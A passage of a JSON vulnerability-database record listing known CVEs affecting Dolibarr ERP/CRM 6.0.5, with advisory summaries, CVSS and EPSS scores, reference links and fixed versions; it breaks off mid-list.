{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","type":"composer","namespace":"dolibarr","name":"dolibarr","version":"6.0.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/35024?format=json","vulnerability_id":"VCID-1247-tc3p-g3d2","summary":"Dolibarr Cross-site Scripting vulnerability\nCross-site Scripting (XSS) - Generic in GitHub repository dolibarr/dolibarr prior to 18.0.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"0.00206","scoring_system":"epss","scoring_elements":"0.4294","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5323"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/695ca086847b3b6a185afa93e897972c93c43d15"},{"reference_url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-20T15:11:59Z/"}],"url":"https://huntr.dev/bounties/7a048bb7-bfdd-4299-931e-9bc283e92bc8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5323"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67209?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-5323","GHSA-39m3-cj8c-886r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1247-tc3p-g3d2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/43033?format=json","vulnerability_id":"VCID-17fx-qrxs-kbhk","summary":"Improper Access Control in Dolibarr\nIn “Dolibarr” application, 2.8.1 to 13.0.4 don’t restrict or incorrectly restricts access to a resource from an unauthorized actor. A low privileged attacker can modify the Private Note which only an administrator has rights to do, the affected field is at “/adherents/note.php?id=1” endpoint.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"0.00171","scoring_system":"epss","scoring_elements":"0.38142","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25954"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/8cc100012d46282799fb19f735a53b7101569377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25954"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25954"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370707?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.5"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25954","GHSA-vxhc-c4qm-647p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-17fx-qrxs-kbhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/42168?format=json","vulnerability_id":"VCID-1qq7-1tkv-kqd3","summary":"Dolibarr vulnerable to Improper Authentication and Improper Access Control\nIn `Dolibarr` application, v3.3.beta1_20121221 to v13.0.2 have `Modify` access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user `Login`. This leads to complete account takeover of the victim user. This happens since the password gets overwritten for the victim user having a similar login name.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"0.00372","scoring_system":"epss","scoring_elements":"0.5922","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/370744?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/76015?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25956","GHSA-fjqg-w8g6-hhq8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1qq7-1tkv-kqd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/13970?format=json","vulnerability_id":"VCID-1xws-6qbv-c7h4","summary":"Dolibarr arbitrary file upload vulnerability\nAn arbitrary file upload vulnerability in the Upload Template function of Dolibarr ERP CRM up to v19.0.1 allows attackers to execute arbitrary code via uploading a crafted .SQL file.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821","reference_id":"","reference_type":"","scores":[{"value":"0.00234","scoring_system":"epss","scoring_elements":"0.46355","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-37821"},{"reference_url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-06-20T15:21:39Z/"}],"url":"https://github.com/alexbsec/CVEs/blob/master/2024/CVE-2024-37821.md"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37821","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37821"},{"reference_url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46","reference_id":"GHSA-p7r8-7w87-8g46","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p7r8-7w87-8g46"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/38106?format=json","purl":"pkg:composer/dolibarr/dolibarr@19.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@19.0.2"}],"aliases":["CVE-2024-37821","GHSA-p7r8-7w87-8g46"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1xws-6qbv-c7h4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/17268?format=json","vulnerability_id":"VCID-2s1r-jffc-dqc7","summary":"Dolibarr Allows Code Injection through its Website Module\nIn Dolibarr ERP & CRM <= 22.0.4, PHP code detection and editing permission enforcement in the Website module is not applied consistently to all input parameters, allowing an authenticated user restricted to HTML/JavaScript editing to inject PHP code through unprotected inputs during website page creation.\n\nA patch is available at https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0.","references":[{"reference_url":"http://dolibarr.com","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"http://dolibarr.com"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15469","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31018"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/ba28d16da4cc0c221f49a878fecc8425501ceb96"},{"reference_url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/releases/tag/23.0.0"},{"reference_url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T15:30:39Z/"}],"url":"https://github.com/PhDg1410/CVE/blob/main/CVE-2026-31018/README.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31018"},{"reference_url":"https://github.com/advisories/GHSA-676v-wh57-p375","reference_id":"GHSA-676v-wh57-p375","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-676v-wh57-p375"}],"fixed_packages":[],"aliases":["CVE-2026-31018","GHSA-676v-wh57-p375"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2s1r-jffc-dqc7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48777?format=json","vulnerability_id":"VCID-39gm-mkxs-1uf9","summary":"Dolibarr vulnerable to Eval Injection\nDolibarr ERP & CRM <=15.0.3 are vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"0.51559","scoring_system":"epss","scoring_elements":"0.97938","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-40871"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/youncyb/dolibarr-rce","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-05-15T15:00:17Z/"}],"url":"https://github.com/youncyb/dolibarr-rce"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40871"},{"reference_url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2","reference_id":"GHSA-7cm4-vmf2-8wf2","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7cm4-vmf2-8wf2"}],"fixed_packages":[],"aliases":["CVE-2022-40871","GHSA-7cm4-vmf2-8wf2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-39gm-mkxs-1uf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61721?format=json","vulnerability_id":"VCID-3spa-q7qf-suez","summary":"Dolibarr Stored Cross-site Scripting in expensereport/card.php\nAn issue was discovered in Dolibarr through 7.0.0. There is Stored XSS in expensereport/card.php in the expense reports plugin via the comments parameter, or a public or private note.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16808"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16808"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{